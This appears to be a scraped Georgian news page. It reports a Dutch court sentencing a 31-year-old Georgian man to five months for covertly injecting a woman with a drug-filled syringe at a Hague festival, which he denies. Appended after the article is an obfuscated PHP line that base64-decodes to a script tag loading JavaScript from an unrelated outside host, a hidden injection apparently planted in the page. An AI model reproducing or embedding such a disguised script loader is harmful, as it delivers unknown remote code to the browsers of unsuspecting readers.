celsiusi
ავერსი შნაიდერი
ნიდერლანდების სასამართლომ 31 წლის ქართველ მამაკაცს 5-თვიანი პატიმრობა მიუსაჯა. მას, ბრალი ედება ახალგაზრდა ქალისთვის, ჰააგის ფესტივალზე ჩუმად ნემსის გაკეთებაში. რის შედეგადაც ქალს თავბრუ დაეხვა, ცუდად გახდა და საავადმყოფოში გადაიყვანეს. 
 
გამოცემა NL Times წერს, რომ ინციდენტი ზუიდერპარკში, ფესტივალზე 18 ივნისს მოხდა. ახალგაზრდა კაცი სცენაზე დააკავეს. პოლიციამ მისი ჩხრეკისას აღმოაჩინა შპრიცები, რომლებიც ნარკოტიკულ ნივთიერებებს შეიცავდა.
 
გამოცემის ცნობით, ფესტივალზე მყოფმა რამდენიმე ადამიანმა დაინახა, რომ 31 წლის კაცმა ქალს ნემსი ჩაარჭო. 
 
"მაბრალებენ იმას, რაც არ გამიკეთებია" - თქვა დაკავებულმა ქართველმა და განმარტა, რომ შპრიცი თან კბილის ტკივილის გამო ჰქონდა. 
649
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");